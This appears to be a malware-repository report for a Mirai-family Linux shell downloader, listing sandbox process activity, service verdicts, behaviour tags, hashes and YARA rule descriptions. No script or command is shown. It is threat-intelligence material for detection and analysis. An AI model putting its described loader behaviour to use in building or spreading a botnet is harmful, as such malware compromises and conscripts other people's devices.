pid=5334->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=65cbfade-2400-0000-f04a-026dd6140000 pid=5334->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 646B guuid=65cbfade-2400-0000-f04a-026dd6140000 pid=5334->3ec2bfaf-8e71-5eeb-b8ce-6ffe78958b80 send: 85B guuid=802e5adf-2400-0000-f04a-026dd7140000 pid=5335->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 164B guuid=58dfc323-2500-0000-f04a-026dd8140000 pid=5336->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 113B guuid=0e84de72-2500-0000-f04a-026ddb140000 pid=5339->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=2a7a7073-2500-0000-f04a-026ddc140000 pid=5340 /tmp/Chaotic guuid=0e84de72-2500-0000-f04a-026ddb140000 pid=5339->guuid=2a7a7073-2500-0000-f04a-026ddc140000 pid=5340 clone guuid=0e421caf-2500-0000-f04a-026ddd140000 pid=5341 /tmp/Chaotic guuid=0e84de72-2500-0000-f04a-026ddb140000 pid=5339->guuid=0e421caf-2500-0000-f04a-026ddd140000 pid=5341 clone guuid=2f6fceea-2500-0000-f04a-026dde140000 pid=5342 /tmp/Chaotic guuid=0e84de72-2500-0000-f04a-026ddb140000 pid=5339->guuid=2f6fceea-2500-0000-f04a-026dde140000 pid=5342 clone guuid=a14a7c26-2600-0000-f04a-026ddf140000 pid=5343 /tmp/Chaotic guuid=0e84de72-2500-0000-f04a-026ddb140000 pid=5339->guuid=a14a7c26-2600-0000-f04a-026ddf140000 pid=5343 clone guuid=5c988126-2600-0000-f04a-026de0140000 pid=5344 /tmp/Chaotic dns net send-data zombie guuid=0e84de72-2500-0000-f04a-026ddb140000 pid=5339->guuid=5c988126-2600-0000-f04a-026de0140000 pid=5344 clone guuid=5c988126-2600-0000-f04a-026de0140000 pid=5344->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=5c988126-2600-0000-f04a-026de0140000 pid=5344->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 494B guuid=5c988126-2600-0000-f04a-026de0140000 pid=5344->3ec2bfaf-8e71-5eeb-b8ce-6ffe78958b80 send: 60B guuid=fe029a26-2600-0000-f04a-026de1140000 pid=5345->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 165B guuid=55aeeb6f-2600-0000-f04a-026de2140000 pid=5346->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 114B guuid=ba2e7ca5-2600-0000-f04a-026de5140000 pid=5349->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=d6de13a6-2600-0000-f04a-026de6140000 pid=5350 /tmp/Chaotic guuid=ba2e7ca5-2600-0000-f04a-026de5140000 pid=5349->guuid=d6de13a6-2600-0000-f04a-026de6140000 pid=5350 clone guuid=2c08cfe1-2600-0000-f04a-026de7140000 pid=5351 /tmp/Chaotic guuid=ba2e7ca5-2600-0000-f04a-026de5140000 pid=5349->guuid=2c08cfe1-2600-0000-f04a-026de7140000 pid=5351 clone guuid=f673891d-2700-0000-f04a-026de8140000 pid=5352 /tmp/Chaotic guuid=ba2e7ca5-2600-0000-f04a-026de5140000 pid=5349->guuid=f673891d-2700-0000-f04a-026de8140000 pid=5352 clone guuid=32544759-2700-0000-f04a-026de9140000 pid=5353 /tmp/Chaotic guuid=ba2e7ca5-2600-0000-f04a-026de5140000 pid=5349->guuid=32544759-2700-0000-f04a-026de9140000 pid=5353 clone guuid=1f845259-2700-0000-f04a-026dea140000 pid=5354 /tmp/Chaotic dns net send-data zombie guuid=ba2e7ca5-2600-0000-f04a-026de5140000 pid=5349->guuid=1f845259-2700-0000-f04a-026dea140000 pid=5354 clone guuid=1f845259-2700-0000-f04a-026dea140000 pid=5354->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=1f845259-2700-0000-f04a-026dea140000 pid=5354->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 380B guuid=1f845259-2700-0000-f04a-026dea140000 pid=5354->3ec2bfaf-8e71-5eeb-b8ce-6ffe78958b80 send: 50B guuid=13547a59-2700-0000-f04a-026deb140000 pid=5355->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 165B guuid=baaaaba0-2900-0000-f04a-026df6140000 pid=5366->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 114B guuid=009974d9-2a00-0000-f04a-026df9140000 pid=5369->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=237506da-2a00-0000-f04a-026dfa140000 pid=5370 /tmp/Chaotic guuid=009974d9-2a00-0000-f04a-026df9140000 pid=5369->guuid=237506da-2a00-0000-f04a-026dfa140000 pid=5370 clone
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/101d740fef21b3d8e827f9245bcbfbfd5f73273e8b6ef1125ac98539e3f8e0e2
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/101d740fef21b3d8e827f9245bcbfbfd5f73273e8b6ef1125ac98539e3f8e0e2/
Verdict:
Malicious
Threat:
Family.MIRAI
Link:
https://tip.neiki.dev/file/101d740fef21b3d8e827f9245bcbfbfd5f73273e8b6ef1125ac98539e3f8e0e2
Threat name:
Linux.Downloader.Medusa
Create hunting rule
Status:
Malicious
First seen:
2026-01-08 22:52:50 UTC
File Type:
Text (Shell)
AV detection:
22 of 36 (61.11%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=caoxid7pegz5r2bh7esfxs737vpxgjz6rnxpces2zgctty7y4dra._file
Result
Malware family:
mirai
Create hunting rule
Score:
  10/10
Tags:
family:mirai botnet:lzrd antivm botnet defense_evasion discovery linux upx
Link:
https://tria.ge/reports/260113-wd7wlsew2b/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Checks CPU configuration
UPX packed file
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Mirai
Mirai family
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Suspicious File
Score:
0.39
Link:
https://yomi.yoroi.company/submissions/101d740fef21b3d8e827f9245bcbfbfd5f73273e8b6ef1125ac98539e3f8e0e2

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders
Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 101d740fef21b3d8e827f9245bcbfbfd5f73273e8b6ef1125ac98539e3f8e0e2

(this sample)

Mirai

elf e38049a1353607de8d03af1ec86f6b12730ddc5b0567122acd8f2d9b17eb1acf

  
URLhaus
https://urlhaus.abuse.ch/url/3757623/
  
Delivery method
Distributed via web download
  
Dropping
MD5 ad6ae78ca83127c3c3d8eed3c189ca19
  
Dropping
SHA256 e38049a1353607de8d03af1ec86f6b12730ddc5b0567122acd8f2d9b17eb1acf

Comments